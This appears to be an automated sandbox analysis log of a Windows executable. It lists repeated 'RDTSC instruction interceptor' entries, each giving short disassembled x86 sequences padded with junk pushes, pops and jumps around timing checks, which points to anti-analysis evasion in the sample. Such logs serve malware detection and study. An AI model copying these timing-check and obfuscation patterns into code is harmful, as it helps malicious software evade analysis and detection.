Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 33737D second address: 337387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 337387 second address: 33738D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 33738D second address: 337396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 337396 second address: 33739A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 33739A second address: 3373BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE04F8896h 0x00000007 jng 00007F4AE04F8886h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 337693 second address: 3376D7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4AE0E87EBAh 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F4AE0E87EC9h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 pushad 0x00000015 jng 00007F4AE0E87EB6h 0x0000001b jmp 00007F4AE0E87EBDh 0x00000020 jnl 00007F4AE0E87EB6h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3376D7 second address: 3376E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F4AE04F8886h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 337837 second address: 337848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4AE0E87EBCh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 337848 second address: 337865 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F4AE04F8897h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 33AA10 second address: 33AA7A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F4AE0E87EC3h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F4AE0E87EC9h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007F4AE0E87EC5h 0x0000001a mov eax, dword ptr [eax] 0x0000001c pushad 0x0000001d push eax 0x0000001e pushad 0x0000001f popad 0x00000020 pop eax 0x00000021 push eax 0x00000022 pushad 0x00000023 popad 0x00000024 pop eax 0x00000025 popad 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a pushad 0x0000002b jbe 00007F4AE0E87EB8h 0x00000031 push ebx 0x00000032 pop ebx 0x00000033 pushad 0x00000034 push edi 0x00000035 pop edi 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 33AA7A second address: 1AEB8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pop eax 0x00000007 jmp 00007F4AE04F8891h 0x0000000c push dword ptr [ebp+122D0099h] 0x00000012 mov si, 0445h 0x00000016 call dword ptr [ebp+122D1859h] 0x0000001c pushad 0x0000001d add dword ptr [ebp+122D194Bh], edi 0x00000023 xor eax, eax 0x00000025 jmp 00007F4AE04F888Eh 0x0000002a je 00007F4AE04F8887h 0x00000030 mov edx, dword ptr [esp+28h] 0x00000034 mov dword ptr [ebp+122D194Bh], eax 0x0000003a mov dword ptr [ebp+122D3992h], eax 0x00000040 jg 00007F4AE04F8892h 0x00000046 jp 00007F4AE04F888Ch 0x0000004c mov esi, 0000003Ch 0x00000051 jmp 00007F4AE04F888Bh 0x00000056 xor dword ptr [ebp+122D194Bh], eax 0x0000005c add esi, dword ptr [esp+24h] 0x00000060 jc 00007F4AE04F8887h 0x00000066 cld 0x00000067 lodsw 0x00000069 js 00007F4AE04F8887h 0x0000006f clc 0x00000070 add eax, dword ptr [esp+24h] 0x00000074 pushad 0x00000075 movzx edi, cx 0x00000078 mov edi, 2FB83D5Fh 0x0000007d popad 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 clc 0x00000083 push eax 0x00000084 push ebx 0x00000085 push eax 0x00000086 push eax 0x00000087 push edx 0x00000088 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 33AAB3 second address: 33AB13 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4AE0E87EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F4AE0E87EB8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 push 00000000h 0x0000002a call 00007F4AE0E87EC3h 0x0000002f je 00007F4AE0E87EBCh 0x00000035 mov esi, dword ptr [ebp+122D395Eh] 0x0000003b pop edx 0x0000003c push 9530E28Bh 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 jc 00007F4AE0E87EB6h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 33AB13 second address: 33AB17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 33AB17 second address: 33ABC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F4AE0E87EB8h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f add dword ptr [esp], 6ACF1DF5h 0x00000016 cmc 0x00000017 jne 00007F4AE0E87ECBh 0x0000001d push 00000003h 0x0000001f jns 00007F4AE0E87EBCh 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push esi 0x0000002a call 00007F4AE0E87EB8h 0x0000002f pop esi 0x00000030 mov dword ptr [esp+04h], esi 0x00000034 add dword ptr [esp+04h], 00000015h 0x0000003c inc esi 0x0000003d push esi 0x0000003e ret 0x0000003f pop esi 0x00000040 ret 0x00000041 jmp 00007F4AE0E87EC1h 0x00000046 mov edi, dword ptr [ebp+122D391Ah] 0x0000004c push 00000003h 0x0000004e push 00000000h 0x00000050 push ebx 0x00000051 call 00007F4AE0E87EB8h 0x00000056 pop ebx 0x00000057 mov dword ptr [esp+04h], ebx 0x0000005b add dword ptr [esp+04h], 00000014h 0x00000063 inc ebx 0x00000064 push ebx 0x00000065 ret 0x00000066 pop ebx 0x00000067 ret 0x00000068 push B12866DFh 0x0000006d pushad 0x0000006e jmp 00007F4AE0E87EC0h 0x00000073 push edx 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 33AC8C second address: 33AC95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 33AC95 second address: 33AC99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 33AC99 second address: 33AC9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 33AC9D second address: 33ACB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jng 00007F4AE0E87EB6h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 33ACB1 second address: 33ACED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push ecx 0x0000000a je 00007F4AE04F888Ch 0x00000010 mov esi, dword ptr [ebp+122D1A12h] 0x00000016 pop ecx 0x00000017 push 00000000h 0x00000019 mov si, 6E07h 0x0000001d push CAF72002h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F4AE04F8898h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 33ACED second address: 33AD07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4AE0E87EC6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 33AD07 second address: 33ADA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE04F888Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 3508E07Eh 0x00000012 mov edx, dword ptr [ebp+122D3A8Eh] 0x00000018 push 00000003h 0x0000001a jne 00007F4AE04F888Ch 0x00000020 push 00000000h 0x00000022 jp 00007F4AE04F8887h 0x00000028 clc 0x00000029 push 00000003h 0x0000002b jmp 00007F4AE04F8892h 0x00000030 call 00007F4AE04F8889h 0x00000035 jmp 00007F4AE04F8895h 0x0000003a push eax 0x0000003b push ebx 0x0000003c jns 00007F4AE04F8888h 0x00000042 pop ebx 0x00000043 mov eax, dword ptr [esp+04h] 0x00000047 jmp 00007F4AE04F8897h 0x0000004c mov eax, dword ptr [eax] 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F4AE04F888Bh 0x00000057 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 33ADA5 second address: 33ADAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 33ADAB second address: 33ADCC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4AE04F8888h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 ja 00007F4AE04F888Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 33ADCC second address: 33ADE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 mov si, FA72h 0x0000000c lea ebx, dword ptr [ebp+1245F949h] 0x00000012 mov edi, ebx 0x00000014 stc 0x00000015 xchg eax, ebx 0x00000016 push edi 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 33AEDA second address: 33AF4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 add dword ptr [esp], 3CC640EBh 0x0000000c push ecx 0x0000000d push ebx 0x0000000e call 00007F4AE04F8893h 0x00000013 pop edi 0x00000014 pop ecx 0x00000015 pop edx 0x00000016 push 00000003h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F4AE04F8888h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 00000017h 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 jns 00007F4AE04F888Ch 0x00000038 mov dx, di 0x0000003b push 00000000h 0x0000003d mov ecx, dword ptr [ebp+122D38D6h] 0x00000043 push 00000003h 0x00000045 mov edx, dword ptr [ebp+122D3926h] 0x0000004b mov edi, dword ptr [ebp+122D39BEh] 0x00000051 push B9D745A8h 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 33AF4F second address: 33AF53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 33AF53 second address: 33AF5D instructions: 0x00000000 rdtsc 0x00000002 js 00007F4AE04F8886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 33AF5D second address: 33AF9B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4AE0E87EB8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 0628BA58h 0x00000013 sub dword ptr [ebp+122D35FAh], ebx 0x00000019 lea ebx, dword ptr [ebp+1245F954h] 0x0000001f xor edx, 664CDD70h 0x00000025 stc 0x00000026 xchg eax, ebx 0x00000027 pushad 0x00000028 push esi 0x00000029 jmp 00007F4AE0E87EC0h 0x0000002e pop esi 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 33AF9B second address: 33AF9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 35980C second address: 359811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3599A9 second address: 3599C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4AE04F8899h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3599C6 second address: 3599CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 359C4D second address: 359C51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 359C51 second address: 359C57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 359DB8 second address: 359DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 359DBC second address: 359DC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 35A31E second address: 35A322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 35A322 second address: 35A326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 35A73C second address: 35A743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 34DE22 second address: 34DE3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F4AE0E87EBFh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 34DE3A second address: 34DEAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE04F888Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F4AE04F8897h 0x00000013 pop edi 0x00000014 jmp 00007F4AE04F8894h 0x00000019 popad 0x0000001a pushad 0x0000001b pushad 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e jns 00007F4AE04F8886h 0x00000024 popad 0x00000025 pushad 0x00000026 jmp 00007F4AE04F888Bh 0x0000002b jnl 00007F4AE04F8886h 0x00000031 push ecx 0x00000032 pop ecx 0x00000033 push edx 0x00000034 pop edx 0x00000035 popad 0x00000036 jmp 00007F4AE04F888Ah 0x0000003b pushad 0x0000003c push esi 0x0000003d pop esi 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 35AA0D second address: 35AA11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 35AA11 second address: 35AA27 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4AE04F8886h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jnl 00007F4AE04F8886h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 35AA27 second address: 35AA5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F4AE0E87EC9h 0x0000000d jmp 00007F4AE0E87EBEh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 35B21B second address: 35B225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 35B392 second address: 35B3A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jnp 00007F4AE0E87EB6h 0x0000000f jnp 00007F4AE0E87EB6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 35B4F2 second address: 35B4FC instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4AE04F8886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 35B4FC second address: 35B501 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 35B501 second address: 35B516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F4AE04F8886h 0x0000000f ja 00007F4AE04F8886h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 35B516 second address: 35B52B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F4AE0E87EB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 35DE6B second address: 35DE70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 35DE70 second address: 35DE9A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4AE0E87EBCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4AE0E87EC6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 35C772 second address: 35C778 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 35E01F second address: 35E023 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 35E023 second address: 35E02F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 35E02F second address: 35E058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push esi 0x0000000b pushad 0x0000000c jmp 00007F4AE0E87EBDh 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pop esi 0x00000015 mov eax, dword ptr [eax] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jl 00007F4AE0E87EB6h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 35E058 second address: 35E05E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 35E1B7 second address: 35E1BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 35E1BD second address: 35E1C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 35E1C2 second address: 35E1C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 361A72 second address: 361A8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4AE04F888Ch 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 361A8F second address: 361A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 361A95 second address: 361A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3661B5 second address: 3661BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 366A9C second address: 366AAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F4AE04F8886h 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 366C10 second address: 366C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 366C14 second address: 366C34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4AE04F888Fh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop edx 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3699C0 second address: 3699C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 3699C4 second address: 3699CE instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4AE04F888Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 36A072 second address: 36A07B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 36A471 second address: 36A476 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	RDTSC instruction interceptor: First address: 36CEF6 second address: 36CEFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
